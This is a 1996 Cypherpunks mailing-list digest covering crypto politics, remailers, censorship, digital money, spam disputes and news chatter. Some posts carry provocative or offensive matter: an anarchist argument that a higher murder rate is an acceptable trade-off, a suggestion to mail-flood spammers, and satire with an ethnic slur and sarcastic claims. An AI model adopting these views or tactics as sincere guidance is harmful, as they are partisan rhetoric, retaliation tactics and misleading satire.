A savings of 160 million deaths leaves a lot of room for a non-harmful increase in private murder. We could increase the private murder rate by 8 to 10 times and still break even. Note too that most terrorism is aimed at governments (even if practiced on civilians). In the absence of government, terrorist incentives may be reduced. DCF "I don't know if we ought to trust governments with the Net, they might use it to nuke Hiroshima or conquer Europe or something." From strombrg at hydra.acs.uci.edu Mon Sep 9 18:26:52 1996 From: strombrg at hydra.acs.uci.edu (Dan Stromberg) Date: Tue, 10 Sep 1996 09:26:52 +0800 Subject: LACC: Re: What is the EFF doing exactly? In-Reply-To: <199609080749.RAA01948@suburbia.net> Message-ID: <323459C7.5492@hydra.acs.uci.edu> I sent this to you privately, because I did not want a public war. You've chosen to bring it to the list anyway. What you've written below appears to be quite nonsequitur, but I suppose one can guess the upshot. Many governments are quite braindead, when it comes to crypto, yes. I will reiterate: many governments are also quite braindead, when it comes to demonstrating reasonably accurate "metaknowledge", when it comes to having a clue about just how certain something really is. I obviously applaud your efforts to free crypto. I obviously deplore your efforts to fight crypto in the manner of the ugliest of politicians, and find it quite hypocritical that you've suggested that in so doing, you are -avoiding- arguments of those who seek to destroy you. I believe it is quite clear, you're arguing against yourself: your methods are very much those of the ones who "seek to destroy you.", and to the extent that this is true, I'd say they -have- destroyed you. Note that I have seen/noticed no example of this from you - only that you have -stated- that things should be phrased in a quite B&W manner for political advantage. Were you seeking to make things messier, when you brought this to the list without asking first? 
Julian Assange wrote: > > How many of the world's stupid policies have been enacted, because > > someone decided to present only one side of an issue, realized it was > > "the wrong side", and felt they couldn't later change their mind for the > > better - because they presented the issue as overly black-and-white > > initially? > > I agree, however you are confusing large parties, so dominant as to form > government and policy at whim with those that represent a particular > cause or interest group. The EFF falls into the latter category. Its > goals are relatively narrow, its membership tiny. Such a small group, > fighting an under-resourced battle against powerful, conservative interests > does not need, and should not espouse the arguments of those who seek to > destroy it. When canoeing up a waterfall, one does not need to paddle > backwards 50% of the time in order to be "fair". From dthorn at gte.net Mon Sep 9 18:28:19 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 09:28:19 +0800 Subject: L.A. Times articles, etc. Message-ID: <3234624B.1C93@gte.net> I'm sure everyone is familiar with how newspaper articles are not necessarily "pure" news, i.e., they're often slanted toward a particular point of view. Go back a few years, maybe 20 or more, and look at the front page of the L.A. Times (or probably any big-city paper). Many or most news pieces written by UPI, AP, etc., now 100% are written internally. What y'all might want to think about is not just slanting and bias, but how certain people and organizations can actually *plant* a phony story on page one of a major paper like the L.A. Times. Go back a few months and check out the front-page article on real estate prices in the Calif. "Ventura Keys" area. Totally false. Story alleged that prices were "skyrocketing"; prices actually were absolutely flat, after having fallen by 35% or more in the previous couple of years.
Whoever authorized this story, if they didn't get a big kickback or gain some points for some future operation, then I can't imagine why they would print such a thing. I hate to suggest anyone become more cynical than they already are, but, the front page(s) of a big-city newspaper are some of the most valuable real estate in western civilization, so do the math.... From bgamble at wo0033wp.wo.blm.gov Mon Sep 9 18:31:13 1996 From: bgamble at wo0033wp.wo.blm.gov (Barbara Gamble) Date: Tue, 10 Sep 1996 09:31:13 +0800 Subject: Test...sorry about this - Reply - Reply Message-ID: I subscribed just once, real name. Yep, the Welcome msg is ReallyTrulyFine[M]. I reallytrulyread it. High-traffic, though, is relative. In light of Z.B.'s post , I thought that maybe I , too, had a mail probem. Seriously, thanks for the info. >>> Jean-Francois Avon 09/09 2:26 pm >>> On 9 Sep 96 at 11:10, Barbara Gamble wrote: > I got it too. And since I am a new subscriber, I thought it might > be the normal traffic. The Welcome msg *did* say the list is > high-traffic. Still, I was aghast--300 all at once, another 100 > just in the last hour. Is that typical? (Please forgive such a > question from a newcomer to the list.) Usually, between 35 and 100 posts a day, most of which I delete. Did you subscribe twice or three times under slightly different names (but identical e-mail adresses)? RTFine Welcome Message, it explains everything you have to know Hope you'll stay with us. 
Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies, R&D consultant physicists, technologists and engineers PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From steve at edmweb.com Mon Sep 9 18:36:04 1996 From: steve at edmweb.com (Steve Reid) Date: Tue, 10 Sep 1996 09:36:04 +0800 Subject: towards an eternity service In-Reply-To: <199609082212.XAA00383@server.test.net> Message-ID: > The other requirement for eternity is that the data should be secret > shared. [snip] > As the eternity www servers don't know what the data in the shares > they are holding is, they can't provide the indexing facility I don't know much about secret sharing algorithms, but wouldn't the server be able to get the other parts of the shares and know what it's serving? The ability to get that information might affect server liability. With secret splitting, there is a simple way to create duress parts. I don't know if it's possible with secret sharing.. X is politically-incorrect data. Y is data nobody would ever object to. R is a truly random string of bits. Alice has X xor R on her server. Bob has R on his server. Carol has X xor Y xor R on her server. Dave has Y xor R on his server. Alice and Bob are together distributing X. So are Dave and Carol. However, if someone were to say that Alice and Bob (and/or Dave and Carol) are distributing something politically incorrect, Alice and Carol (and Bob and Dave) can get together and say "No, We're distributing Y. The other person must be trying to frame me!". In fact, it's quite possible that Alice thought she was distributing Y with Carol, and that Bob thought he was also distributing Y with Dave. If they did not split the secrets themselves, they may not have any knowledge of X's existence. 
Also, if any one of the participants gets shut down, it's still possible to retrieve X, Y and R by using different combinations of the remaining three participants. This scenario could be extended to more participants and secrets. ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) From rodger at interramp.com Mon Sep 9 18:36:53 1996 From: rodger at interramp.com (Will Rodger) Date: Tue, 10 Sep 1996 09:36:53 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <1.5.4.32.19960909182501.00685618@pop3.interramp.com> -----BEGIN PGP SIGNED MESSAGE----- >If you know a valid email address on the spammers system you can always >bounce each message back to them. If enough people turned the messages >back on them it might give them the opportunity to experience first hand >what its like to receive tons of mail you don't want or need... > Ah, but they never do. Why not? Because spammers _invariably_ forge the return addresses to keep exactly that from happening. Indeed, Cyber Promo claims it "had an understanding" with AOL that it could use AOL boxes or bogus addresses to keep bounced messages from coming back at them and crashing their server. Deliberately forging addresses, Cyber claims, is entirely legal. AOL says it's fraud. Interesting footnote: AOL, of course, is able to trace a lot of the spam it gets. It has sent back thousands of messages at once to Cyber which, in turn, has gotten it bumped from several ISPs once their servers crashed as a result. Tough business, huh? 
Will Rodger Washington Bureau Chief Inter at ctive Week -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjSGvTqp6Cc7rRIJAQHCEQP/fZwhp/GTSwj9Emusgh9QFnAlafpOL2qI ces6RqwSoZfmbAmhREh836sakjS2d+mHdYK84FH7WdXWnuzMlDAPCls7OO8AU4t8 oMN7koLM3cpgwlavt/Lw8NJp3wC5OnRnrqNeunkBvNEBs8aaJ+C6isH/zrErgbt5 0QL9cYlEyq8= =EW/y -----END PGP SIGNATURE----- From dthorn at gte.net Mon Sep 9 18:42:06 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 09:42:06 +0800 Subject: Purpose of this forum In-Reply-To: <199609081513.LAA14900@ginger.capitalnet.com> Message-ID: <323382E9.26BD@gte.net> > Wayne H. Allen wrote: > At 03:03 AM 9/8/96 +0000, attila wrote: > =Dear Whoever, > cypherpunks are *not* crackers; this is a crytographic > and political issues relating to cryptography mailing list. > > Well maybe, political issues galore certainly, but very very little > to do with cryptography. I mean what does TWA 800 have to do with this > list. I mean lets be completely honest here, whatever the original > purpose of the list was for its been allowed to shift away from its > intended purpose considerably. > Wayne H.Allen > whallen at capitalnet.com > Pgp key at www.capitalnet.com/~whallen My two cents worth: Since the purpose of the forum is to explore issues affecting personal cryptography and privacy, etc., TWA 800 as an excuse to crank out privacy-depletion laws is certainly of concern here, though one could argue for sub-forums to cover related issues. Reminds me of research into Simpson affair - can you really understand what such a case is all about without "shaking the bushes" and "raking the leaves" quite a bit? So much essential data is avoided by both sides who have pre-determined agendas, that we're left with broken threads of inquiry everywhere. One could argue that Simpson is inconsequential, until one considers changes to the law, particularly to citizen juries. 
Perhaps the ideal would be a top-level forum for crypto-specific issues, then sub-forums for specific related topics, and a catch-all sub-forum for related messages not fitting into the specific sub-forums. I personally don't like the idea of filters; I'd prefer a sieve instead. From pstira at escape.com Mon Sep 9 19:01:12 1996 From: pstira at escape.com (pstira at escape.com) Date: Tue, 10 Sep 1996 10:01:12 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: Message-ID: I think the other big, if not worse, question is, why is it that Flight 800 is still so STEADILY in the news, even now? They seem to be really good at fighting back and forth with themselves with the same outcomes. I don't like this, one bit. I haven't seen this much annoying trash on the news since OJ Shrimpson was around. I don't watch the news anymore. I don't want to know what I am becoming a part of (outlawing illegal immigrants from being able to go to school, nationwide ID cards, being a number (and this only began in the late 70's), and so on and so forth -- we are becoming that which we sought to escape in the 1400's, and that frightens the hell out of me.) --Millie. OBcrypto: There is a product in beta-testing stage now called Secure Mail (and secure web protocol). I haven't gotten around to testing it yet, but have the facts, if anyone wants them -- I'd like to see this pseudoencryption go down the toilet. It makes me ill, though not as ill as the original subject of this post... :) Have a nice day. From zachb at netcom.com Mon Sep 9 19:03:17 1996 From: zachb at netcom.com (Z.B.) Date: Tue, 10 Sep 1996 10:03:17 +0800 Subject: talker In-Reply-To: <199609091814.OAA03889@sherry.ny.ubs.com> Message-ID: On Mon, 9 Sep 1996 pjb at ny.ubs.com wrote: > > Floyd W Odom writes: > > > I am doom13. If there is anyone out there who is a hacker or > > > would like to be one you can talk to me and find out stuff like cracking. > > > Just drop a message at doom13 at juno.com. 
> > > > Are you the same jerk who was posting a week ago? > > > sure sounds like it. is it possible that there could be two such as this? > > -paul Very possible. Try reading the alt.2600 newsgroup for about a week and see how many me-too, teach-me-how2hack, and other lame messages are posted there on a daily basis. God help us now that they've discovered mailing lists. "h3y, w0w, d00dz, th1s cyberpun|< li5t is way |<3\/\/L!" (Translation: Hey, wow, dudes, this cyberpunk list is way cool! for those of you who are asciially impaired :) --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From rah at shipwright.com Mon Sep 9 19:06:28 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 10 Sep 1996 10:06:28 +0800 Subject: Hettinga Plays Horseman, Gets the Last Word... Message-ID: It seems the former Office of Technology Assessment, now called the Institute for Technology Assessment (Go, Newt!), had a need for a horseman on their law-enforcement panel tomorrow. Anyone know where I can get a riding crop? :-). I'm scheduled, anyway. I'm in Cupertino at the moment (the Mac-Crypto conference was, er, insanely great; more on that later), and I haven't received the plane tickets yet (Bob Hettinga: You Buy, I Fly), though they're supposed to show up today. We'll see when I get home tonight. Oh. Any former Pac-Man addicts remember the name of the ghosts? I think there were four, right? Cheers, Bob Hettinga ----------------- The Institute For Technology Assessment ITA INSTITUTE FOR TECHNOLOGY ASSESSMENT WORKSHOP DIGITAL MONEY AND PUBLIC POLICY SEPTEMBER 10, 1996 US House of Representatives, Cannon Office Building, Room 121 A Workshop on Public Policy and New Technology: "Digital Money" is a rapidly evolving financial/communications technology. 
It is important that government, industry, and the public fully understand the unique characteristics and potential benefits and costs of this radically new technology, so that benefits may be fully realized and costs avoided through early, judicious attention to public policy issues and concerns. This workshop brings together the stakeholders and interested parties -including the public and their government representatives-to consider the issues that may be posed by this emerging technology. In this workshop, attention will be focused on three questions: What issues need to be resolved now if development of digital money is to proceed with minimal social costs and institutional risks? Where is there general agreement about needed actions, or about reasonable solutions to recognized problems? Where are there true uncertainties that must be monitored, solved empirically, or objectively researched? The workshop will consist of three sessions. Each will begin with invited presentations, followed by open discussion among presenters and participants. Moderator: Dr. Wayne Boucher of Strategic Futures International 10 a.m. Greetings and Introductions Keynote Address: The Honorable Michael Castle Chairman, Subcommittee on Domestic and International Monetary Policy House Committee on Banking and Financial Services 10:30 a.m. Session I : Digital Money Systems, Today and Tomorrow - Industry Perspectives Who are the players in developing digital money -and what new players will emerge? What are the potential benefits -and costs-for banks, credit card companies, telecom companies, software vendors, or others? What has been learned from early pilot systems? What are the relative advantages-and risks-of smart cards vs. network-based systems? What older payment systems lose ground to electronic money and smart cards? Is the playing field level with respect to regulation and legislation? 
Specific issues that may be raised include questions about state licensing, Bank Secrecy Act coverage and financial privacy, protocols for payments of different sizes, clearinghouses, and multiple mints. PRESENTERS: Roger Applewhite, Benton International, Inc., Torrance, California William Barr, Bellcore, Basking Ridge, N.J. Electronic Funds Transfer Association, Reston, Virginia Kawika Daguio, American Bankers Association, Washington, D.C. 12:30 p.m. Buffet lunch 1:15 p.m. Session II. Government's Role in the Development of Digital Money How may existing laws and regulations impede the development of digital money? Does the possibility of future regulations or restrictions threaten to drive development in sub-optimal directions? Do banks or other potential developers need firmer assurances about regulatory intentions? Does existing legislation and regulation adequately protect property and contract rights with regard to digital money? What might be the effect of European data protection initiatives, and what steps can the US government take to circumvent international friction over this issue? What are the major risks imposed by digital money, including risks of devaluation of US currency? Could private insurance buttress against network failure, electronic runs on money, or other sources of catastrophic risk? To what extent could a failure in digital money systems contaminate or threaten the traditional banking system, or the integrity of traditional money systems? Who will set standards with respect to risk management and capital adequacy of clearing systems? Should smart cards and small internet transactions be exempt from Regulation E and EFTA protections against consumer liability? Would -or should Representative Markey's On-line Privacy Bill cover digital money transactions? Would non-bank digital money mints be covered by the Right to Financial Privacy Act of 1978 and the Electronic Communications Act of 1986? 
Which party would bear the risk of loss in case of hard-disk crashes, counterfeiting, network failure, etc.? PRESENTERS: Melanie Fein, Arnold & Porter, Washington, D.C. L. Richard Fisher, Morrison & Foerster, Washington, D.C. Professor Sarah Jane Hughes, Indiana University Law School 2:45 p.m. Session III: Law Enforcement Issues Will anonymous instantaneous digital money create the possibility of new crimes, or new versions of old crimes -theft, money laundering, insider trading, etc.? How would the flow of invisible, non-traceable money affect law enforcement and the administration of justice? Do benefits of encryption outweigh the possible harm to law enforcement capabilities? Does digital money threaten the new focus of law enforcement on seizing the proceeds of criminal enterprises? Considering the lessor of the Digital Telephony Act, can early cooperation between digital money providers and law enforcement avoid the heavy costs of retrofitting systems to accommodate the needs of law enforcement? What is the appropriate role of government in assuring the security of digital money systems against breaches by insiders, or criminals, or terrorists? To what extent would digital money threaten the ability of the IRS to collect taxes or to prosecute tax dodgers? PRESENTERS: Roger Weiner, Deputy Director, FinCEN, U.S. Department of the Treasury Scott Charney, Chief, Computer Crimes Section, U.S. Department of Justice Robert Hettinga, Boston, MA 4:00 p.m. Adjournment Conference Organizers Steven Bonorris, Vary Coates (ITA) 202 686 0693 ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From tcmay at got.net Mon Sep 9 19:17:10 1996 From: tcmay at got.net (Timothy C. 
May) Date: Tue, 10 Sep 1996 10:17:10 +0800 Subject: SPL -- Suspicious Persons List Message-ID: Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming in this morning. I'm sure you're busy, so I'll make this as short as possible. OK with you?" Joseph Shlubsky, Programmer: "Uh, sure." Digitaltronics: "Joe, we have a problem. We understand that on your last two business trips you've been flagged for Special Processing at airport security. We checked, and it seems you're on the Suspicious Persons List. As you know, this causes problems for your fellow travellers (no pun intended, eh Joe ). And, Joe, it undermines the corporate image for one of our people to be on the SPL. I'm sure you see our problem?" JS: "Uh...." Digitaltronics: "Joe, we're not sure what you've been doing to get yourself put on the SPl, and we're forbidden by the Fairness in Employment Act from even asking you about your interests and affiliations, but we really can't have representatives of Digitaltronics being pulled aside for SPL processing, now can we?" JS: "But I told them I was only carrying a briefcase, and that they could search it all they wanted to, and--" Digitaltronics: "Joe, I'm sorry, but we're going to have to let you go. You know how these things are. Nothing can be done. Not our decision, when you think about it. The government has their ideas of who should be on the Suspicious Persons List, and there's just nothing we can do about it. We just can't have our corporate image linked to persons on the SPL. Now, Joe, you'll get a generous 6 weeks of severance pay, and Daphne will assist you with your outplacement processing. Of course, Joe, you will have to go through an inspection every morning until you're fully processed...there's that SPL matter, you know." JS: "Uh..." From tcmay at got.net Mon Sep 9 19:26:09 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 10:26:09 +0800 Subject: ... subversive leftists Message-ID: At 4:57 PM 9/9/96, William H. 
Geiger III wrote: >In , on 09/09/96 at >12:53 PM, > Stephan Schmidt said: > > >>I hope this one was ironic. > >>> The Democratic People's German Reich is fully justified in cutting off >>> contacts with subversive radical publications in Jew-dominated nations like >>> Holland. >>> >>> As Reichskommander Schmidt points out: "The citizen-units who access >> ^^^^^^^^^^^^^^^^^^^^^^^ >>But this one is tasteless and insulting even if it was >>meant ironic. > >If the boot fits....... > I don't know why Stephan waited so many days to make his comment. It was my noticing that I had "collided" with his name, Schmidt, when I made my facetious post that caused me to almost immediately issue a clarification that I was not thinking of him when I made my first post. To be clear, again, I was not basing my "Reichskommander Schmidt" line on Stephan Schmidt. That was just a coincidence. As to the "Reichskommander," in our country, and on the Net, such jokes are not illegal. I rather suspect they are in Germany, either the DDR or the Western side. As to "tasteless and insulting," a matter of personal perspective. I find it helpful to call a spade a spade, and others apparently do as well. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 9 19:32:15 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 10:32:15 +0800 Subject: U.S. 
as a Terrorist State Message-ID: At 6:29 PM 9/9/96, Duncan Frissell wrote: >And I support a terrorist organization (the US Government) every year >whether I want to or not. The US was convicted of a major violation of >international law (akin to terrorism) in the International Court of Justice >back in the '80s for air sowing mines in Nicaragua's main harbor. This is a lie, a lie by the subversive left. As is well-known, the recent unpleasantness surrounding the Sandanista State was a police action in which Air America was protecting its agricultural subsidies to certain freedom-loving, non-leftist nations. Principally Bolivia, Columbia, and Peru. As noted foodstuff vendor, the Culinary Institute of America, was the prime importer of these agricultural products, the CIA was of course involved in this police action to protect the flow of their goods. The mining of a harbor of a state with which we are not at war, and which has a government elected by a democratic process, is justified if the Commander in Chief believes it is. When the U.S. funds freedom fighters in Iran and Iraq, this is different of course from when Libya funds terrorists. (It is different because our Commander in Chief tells us it is.) That the World Court would find the United States guilty of terrorist actions (and cases are pending involving the U.S.-funded bombing of Cuban planes, the use of bomblets in toys dropped in other police action cases, and the funding of the Brigate Rose by Gehlen operatives...) shows the World Court is becoming dangerously independent. I suggest the U.S. cut off funding until it learns to heel. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From weidai at eskimo.com Mon Sep 9 19:37:18 1996 From: weidai at eskimo.com (Wei Dai) Date: Tue, 10 Sep 1996 10:37:18 +0800 Subject: papers on anonymous protocols Message-ID: I found a couple of papers on anonymous protocols that I haven't seen mentioned here before. I'll list them for people who might be interested: Cryptographic Defense Against Traffic Analysis by Rackoff and Simon. http://pct.microsoft.com/papers/ta.ps gives a proof of security for a mix-net like protocol. A. Pfitzmann, B. Pfitzmann, M. Waidner: ISDN-MIXes - Untraceable Communication with Very Small Bandwidth Overhead; Proc. Kommunikation in verteilten Systemen, Feb. 1991, Mannheim, Informatik-Fachberichte 267, Springer-Verlag, Heidelberg 1991, 451-463. describes a protocol for anonymous telephone calls. Wei Dai From jya at pipeline.com Mon Sep 9 19:39:10 1996 From: jya at pipeline.com (John Young) Date: Tue, 10 Sep 1996 10:39:10 +0800 Subject: Crypto Num Mum, Hmm Message-ID: <199609091704.RAA00150@pipe2.t2.usa.pipeline.com> The Washington Post, September 9, 1996, p. A2. Computers: Number Crunchers' 1 and Only It's big. It's beautiful. And it's prime. Computer scientists at Cray Research have discovered the largest known prime number. A prime number, for those of us who have forgotten grade school mathematics, can only be divided by itself and by 1. Smaller primes include 2, 3, 5, 7 and 11. The new one, 2^1257787-1, is a bit bigger. Printed out, the 378,632 digit number would take up 12 newspaper pages. "We're pretty confident that this is the largest known prime number," said researcher Paul Gage. 
There are an infinite number of primes but they are extremely difficult to find. The newly discovered prime number is of a type known as a "Mersenne" prime, named for a 17th century French monk and mathematician. It is easier to prove the prime-ness of Mersenne numbers than other primes, thanks to complex mathematical software. Cray runs the prime-testing program to search for bugs in its new supercomputers. Gage said the discovery of the prime was a happy byproduct of the process. The new number was discovered during a six-hour run testing a new Cray T94 system. Prime numbers are useful in the field of cryptography, where they are used to help construct virtually unbreakable codes. The new prime is far larger than those commonly used. Said Gage, "A cryptographer interested in numbers this big wouldn't be talking about it." -- John Schwartz [End] From tcmay at got.net Mon Sep 9 19:40:37 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 10:40:37 +0800 Subject: China joins Singapore, Germany, .... Message-ID: At 6:29 PM 9/9/96, Duncan Frissell wrote: >Course there hasn't really been much net censorship. Germany and China's >attempts have not been effective. The Feds lack a mechanism for "blocking >sites." There is no one in a position to give such an order. There is no >chance that such an order would be obeyed in any widespread way in any case. >Outlaw boards crackdowns didn't diminish the number of outlaw boards. Porno >boards crackdowns did not diminish the number of porno boards. Since it is >easier to create a site than it is to set up a board, legal maneuvers by the >Feds won't work. > >Making sites "illegal to connect to" is meaningless because most users won't >even know what is on the list and most of those who do will be encouraged to >connect to them rather than discouraged. 
While I agree with Duncan's sentiments (obviously) and even agree that censorship is impossible to completely implement, I think Duncan is oversimplifying and thus trivializing the dangers to Chinese, German, Singaporean, etc., subjects. Prison sentences in Germany for those who reveal forbidden information about "the Holocaust," prison terms (or worse) for dissidents in Burma, China, and, of course, various other nations and "democratic people's republics." Even here in the United States, connecting to an illegal site may mean imprisonment. (The charge: trafficking in child pornography, for example.) Rather than saying such laws are "meaningless," developing blinded, steganographic, etc. proxies may be a more useful strategy. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From demo at offshore.com.ai Mon Sep 9 19:41:40 1996 From: demo at offshore.com.ai (Vince) Date: Tue, 10 Sep 1996 10:41:40 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: <199609091638.MAA19400@mail2.panix.com> Message-ID: On Mon, 9 Sep 1996 tbyfield at panix.com wrote: > vince at offshore.com.ai (Vincent Cate): > > If the Navy was firing missiles in this area, it really does seem like the > > press should be checking out this angle. > > What makes you think they aren't? Not saying they aren't; however, I don't recall seeing CNN or any of the networks saying if the Navy really was firing missiles or not. Have they? 
Never seen anyone ask questions about US firing missiles (have seen them ask if it was a missile or a bomb). I don't get any US newspapers here in Anguilla, so my impression of the US press is really just from TV. Is the press on top of this? -- Vince From jbugden at smtplink.alis.ca Mon Sep 9 19:44:37 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Tue, 10 Sep 1996 10:44:37 +0800 Subject: What is the EFF doing exactly? Message-ID: <9608098423.AA842308610@smtplink.alis.ca> This may be a hopelessly naive question, but is it possible to refuse payment in cash? Is it really good for all debts public and private? James ---------- From: kamml at secret.org Sent: Monday, September 09, 1996 3:23 PM To: cypherpunks at toad.com Subject: Re: What is the EFF doing exactly? Fedex will not accept cash in New York City. I have tried to pay cash and been refused. I have talked to customer service and confirmed that they will not accept cash in NYC although they will elsewhere. From ses at tipper.oit.unc.edu Mon Sep 9 19:46:09 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Tue, 10 Sep 1996 10:46:09 +0800 Subject: Crypto Num Mum, Hmm In-Reply-To: <199609091704.RAA00150@pipe2.t2.usa.pipeline.com> Message-ID: It's kind of tempting to generate the key and certificate using this as q and the previous largest as p, if only for machismo at keysignings :-) --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From weidai at eskimo.com Mon Sep 9 19:51:19 1996 From: weidai at eskimo.com (Wei Dai) Date: Tue, 10 Sep 1996 10:51:19 +0800 Subject: strengthening remailer protocols In-Reply-To: Message-ID: On Sun, 8 Sep 1996, Lance Cottrell wrote: > Mixmaster prevents replay, so flooding multiple copies of a single message > will not work. 
This is the reason Mixmaster has no reply block feature. I > can see two ways in which replies can work safely. How about a combination of the two? Suppose Alice wants to anonymously post a message and get replies. She generates a new RSA key, signs her post with it, and asks readers to send encrypted replies to a server. Then periodically she sends a one-time reply block to the server to retrieve the accumulated replies. This would let Alice receive an unbounded number of replies and also give some protection against the denial-of-service and rubber-hose attacks Lance described. Wei Dai From frissell at panix.com Mon Sep 9 19:51:23 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 10:51:23 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <2.2.32.19960909182906.008a8378@panix.com> At 01:03 AM 9/9/96 -0700, Timothy C. May wrote: > >CNN is presenting coverage of China's decision to pull the plug on more >than 100 sites, and issuing a list of sites which are illegal to connect >to. > >(Net censorship is getting to be a big story....when the list of countries >reaches 15, it will of course no longer be news. And when the United States >block access, this will all be transmogrified into an "Anti-Terrorist >Action.") Course there hasn't really been much net censorship. Germany and China's attempts have not been effective. The Feds lack a mechanism for "blocking sites." There is no one in a position to give such an order. There is no chance that such an order would be obeyed in any widespread way in any case. Outlaw boards crackdowns didn't diminish the number of outlaw boards. Porno boards crackdowns did not diminish the number of porno boards. Since it is easier to create a site than it is to set up a board, legal maneuvers by the Feds won't work. 
Making sites "illegal to connect to" is meaningless because most users won't even know what is on the list and most of those who do will be encouraged to connect to them rather than discouraged. Meanwhile the most dangerous sites are not ones on any banned list but the simple sites individuals put up for their hobbies and businesses which get them used to the networked world and get them used to independent thought and action. To being actors rather than passive consumers. Questioning, building, developing a sense of their own powers. Soaking up the libertarian culture of the nets through their skins without even noticing it. More dangerous than fulminate of mercury. DCF "If people do lots of things they get used to doing lots of things. If people make lots of choices they get used to making lots of choices. If people get used to doing and choosing pretty soon they get used to being free without even noticing it." From nobody at replay.com Mon Sep 9 20:03:36 1996 From: nobody at replay.com (Anonymous) Date: Tue, 10 Sep 1996 11:03:36 +0800 Subject: U.S. Presidential Odds Are In Message-ID: <199609092200.AAA10566@basement.replay.com> Hello, I am the anonymous oddsman, here with the U.S. presidential odds, kindly provided to me by a person who wishes to remain anonymous. Some of you know who I am, and I would prefer that my true identity remain a mystery, as what I am doing may well be slightly illegal AFAIK. Thank you. Ladbroke's customer service person [number +44 181 8621820 (that's a London area code)] looked up the info. He had to call someone else to get Perot's odds. Next time (if they even have them) Harry Browne odds. Here's what Ladbroke's said today: 1:7 Clinton 4:1 Dole 50:1 Ross Perot That's all for today, this information will be posted approximately weekly, but more often as the election approaches or major events happen, and certainly more often if my posting it appears to be somehow annoying U.S. authorities. 
;) the anonymous oddsman From ses at tipper.oit.unc.edu Mon Sep 9 20:05:02 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Tue, 10 Sep 1996 11:05:02 +0800 Subject: Imminent Death of the Internet, GIF at 11 In-Reply-To: <199609091614.MAA24724@jekyll.piermont.com> Message-ID: Remember, though - TCPs initial estimate of the congestion window is never less than one packet, large numbers of opening connections can still (I think) lead to congestion collapse. It can defnitely get close to it. At one point, when sunsite was getting a few 100k hits a day with only one T1 there were times when around 2/3rds of all packets were re-transmitted. Jon Crowcroft observed similar problems at some UK links, though see Van's article on either ietf or end2end a month or so back with the counter argument. Simon On Mon, 9 Sep 1996, Perry E. Metzger wrote: > > Martin Minow writes: > > For several months (years?) Bob Metcalf has been predicting that > > the Internet will self-destruct from overload. His argument > > appears to follow one of Gordon Bell's maxims: "anyone can predict > > the future: all you need is semi-log paper and a ruler." As I > > understand it, Metcalf's argument is that network load (messages, > > packets) is growing exponentially, while network bandwidth (fiber > > capacity, switch performance) is growing linearly. At some point, > > these two curves cross -- and demand will exceed capacity. > > Except for the following. > > 1) TCP backs off. > 2) Capacity is growing exponentially. > > Perry > > --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... 
